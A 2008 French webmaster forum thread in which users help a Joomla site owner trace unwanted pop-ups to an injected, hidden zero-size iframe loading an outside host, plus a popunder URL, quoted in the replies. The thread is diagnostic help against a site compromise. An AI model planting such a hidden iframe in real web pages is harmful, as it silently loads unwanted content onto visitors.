|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
 Posté le : Jeu Aoû 21, 2008 9:22 Sujet du message: Serveur Hacké ? |
|
|
Bonjour tout le monde,
Je vous écrit aujourd'hui car j'ai besoin d'avoir des avis extérieur sur ce qu'il m'arrive depuis une semaine déjà. (J'ai cherché avant de poster)
Sur mon site (buzzmoica.Fr), des pop-ups s'ouvrent à tout va sur n'importe quelle de mes pages alors que bien sûr, je n'ai jamais installé de script pour de telles pubs.
La monétisation du site est uniquement avec Adsense qui vous le savez, n'autorise pas ces publicités intempestives.
Le site est hébergé sur un dédié OVH. Je leur ai écrit et j'attends toujours leur réponse.
Les pubs sont apparemment générées par une plateforme qui s'appelle Blue Advetiser.
Est ce que cela dit quelque chose à quelqu'un ? Avez vous déjà eu ce genre de problème ?
Merci d'avance pour vos réponses !  |
|
| |
|
 |
hebmaster
WRInaute passionné
Inscrit le: 22 Déc 2005
Messages: 977
Localisation: Maroc
|
| Posté le : Jeu Aoû 21, 2008 9:34 Sujet du message: Serveur Hacké ? |
|
|
| <hs>la balise "<style>" est autorisé dans le body? j'ai jamais vu un site le faire sauf sur le tien.</hs> |
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 9:37 Sujet du message: oui |
|
|
| Oui, elle est autorisée, cela peut poser problème ? |
|
| |
|
|
nickargall
WRInaute accro
Inscrit le: 13 Juin 2005
Messages: 4025
Localisation: Exilé au Groland à cause de Joe Dalton
|
| Posté le : Jeu Aoû 21, 2008 9:50 Sujet du message: Serveur Hacké ? |
|
|
(hs) oui on peut le faire, mais c'est pas tres clean(/hs)
En ce qui concerne les popup : ca peut etre un bout de javascript que tu as inséré sur ton site (un truc de compteur gratuit, un script d'annuaire ..) qui génère ces affichages ? Mais j'ai pas vu grand chose dans ton code (survolé rapidement) qui puisse générer ça (a part ptet un script javascript "ltassrv" mais placé en commentaires html, donc .. |
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 10:17 Sujet du message: oui |
|
|
Merci pour les réponses 
J'ai pensé à ça au début, un bout de script perdu, mais rien. Et en plus, ya pas vraiment de raison qu'il y en ai.
Concernant les widgets qui pourraient contenir une pub, pareil, rien à signaler, je n'en ai pas installé.
C'est quand même incroyable dene pas savoir d'où ca vient non ?
Je me demande si OVH n'est pas derrière tout ca.
Pourquoi je pense ça ? Parce que les popups ont commencé à apparaitre le 14 Aout, le jour où il y a eu un problème sur le serveur et qu'une équipe est intervenue sur le serveur. ils ont tout géré tout seul en 24 heures. J'étais en vacances, je ne me suis apperçu de rien. j'ai juste découvert les emails de maintenance...
De plus, ayant installé un disque USB supplémentaire sur le seveur il y a 2 mois, ce même problème était survenu. Il a disparu après que j'ai formaté le lecteur usb et fait son installation.
Ca me parrait logique pour considérer qu'il y a quelque chose avec ovh. Mais je ne comprends pas pourquoi ni comment !
(J'attends toujours la réponse de leur hotline)
 |
|
| |
|
|
Bool
WRInaute accro
Inscrit le: 26 Fév 2004
Messages: 1244
Localisation: Lyon
|
| Posté le : Jeu Aoû 21, 2008 10:25 Sujet du message: Serveur Hacké ? |
|
|
Oh c'est clair que c'est vachement intéressant de la part d'OVH d'aller installer des popups sur les sites de certains clients dédiés...
Tu as un Joomla, et les failles de sécurité y sont fréquentes. Je chercherais d'abord de ce coté à ta place. |
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 10:29 Sujet du message: Serveur Hacké ? |
|
|
Oui tu as raison, ca parrait absurde.
Je vais continuer sur la sécu alors...
Au hasard, Y aurait il un site qui puisse scanner en live et détecter les failles ?
Merci ! |
|
| |
|
|
Spoiler
Nouveau WRInaute
Inscrit le: 26 Oct 2007
Messages: 46
|
| Posté le : Jeu Aoû 21, 2008 10:33 Sujet du message: Serveur Hacké ? |
|
|
Bonjour,
Regarde dans ton code, si tu n'as pas un appel vers cette page :
http://www.diydaily.info/player/player.php
C'est elle qui semble générer tes pop-ups. Cherche en ligne de commande, sinon download ton site, et fais une recherche dans le répertoire à l'aide de l'éditeur Notepad++
Bon Courage ! |
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 10:36 Sujet du message: ok |
|
|
| Je vais voir ca tout de suite, merci |
|
| |
|
|
guicara
WRInaute accro
Inscrit le: 02 Fév 2006
Messages: 2136
Localisation: Dans nos montagnes...
|
| Posté le : Jeu Aoû 21, 2008 11:14 Sujet du message: Serveur Hacké ? |
|
|
Moi je vois ça au chargement de ton index :
Voulu ? |
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 11:43 Sujet du message: non |
|
|
Non, pas voulu du tout !
grrr, je cherche je cherche, merci à toi Guicara |
|
| |
|
|
bproductiv
WRInaute accro
Inscrit le: 27 Déc 2004
Messages: 2440
Localisation: La roche s/ yon
|
| Posté le : Jeu Aoû 21, 2008 11:47 Sujet du message: Serveur Hacké ? |
|
|
-http://creditburner.blueadvertise.com/popunder.php?uid=ZGFuaWVsMDEwMDE=
a tout hasard ?? |
|
| |
|
|
bproductiv
WRInaute accro
Inscrit le: 27 Déc 2004
Messages: 2440
Localisation: La roche s/ yon
|
| Posté le : Jeu Aoû 21, 2008 11:48 Sujet du message: Serveur Hacké ? |
|
|
| trouvé avec firebug > script |
|
| |
|
|
vaxrei
Nouveau WRInaute
Inscrit le: 13 Nov 2007
Messages: 41
|
| Posté le : Jeu Aoû 21, 2008 11:55 Sujet du message: Serveur Hacké ? |
|
|
regarde de ce coté :
| Code: |
<iframe frameborder="0"height="0"width="0"
src="http://www.diydaily.info/player/player.php"></iframe> |
|
|
| |
|
|
thecashcow
Nouveau WRInaute
Inscrit le: 11 Juin 2007
Messages: 43
|
| Posté le : Jeu Aoû 21, 2008 12:45 Sujet du message: re |
|
|
Re Bonjour,
Alors, grâce à vos réponses, je pense être sur la piste.
Comme vous l'avez noté, le site est développé sous Joomla.
Je pense pour l'instant que c'est le module lié au composant Mosets Tree qui a été infiltré.
Sur la page d'accueil, le module se nomme : "Vos Buzz à la Une" et il y a un module similaire dans la section news : "Vos Buzz au hasard"
Ce Script (Iframe) n'est présent que lorsque le module est présent.
Mais je ne suis pas sûr parce que le système de popups ne se déclenche pas toujours, cad que je peux actualiser la page sur laquelle la pub apparaissait sans pour autant qu'elle ne ressorte une deuxième fois...
Ca avance |
|
| |
|
|
| |
|
|
